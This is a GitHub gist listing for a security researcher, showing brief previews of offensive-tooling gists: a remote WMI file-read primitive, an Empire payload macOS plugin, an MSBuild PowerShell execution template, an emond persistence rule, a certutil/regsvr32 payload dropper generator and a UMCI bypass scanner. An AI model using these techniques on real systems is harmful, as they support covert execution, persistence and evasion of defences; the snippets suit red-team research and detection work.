Chris Ross xorrior

xorrior / FileReadPrimitive.ps1
Created June 28, 2018 19:41 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
xorrior / SMConfMigratorPlugin.h
Created June 18, 2018 20:03
SMConfMigratorPlugin header file
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
xorrior / empire-migrationplugin.m
Created May 25, 2018 16:46
Migration Plugin with Empire Payload
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
xorrior / pshell_template_embedded_script.xml
Created December 20, 2016 14:45
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
xorrior / SampleRules.plist
Created January 9, 2018 05:44
Sample Plist for emond
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
xorrior / New-CplBatchFile.ps1
Last active September 20, 2017 12:15
Generate Batch file for cpl file
function New-CplBatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
xorrior / LoadMethodScanner.ps1
Created August 11, 2017 13:04 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]

Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior (https://keybase.io/xorrior) on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object: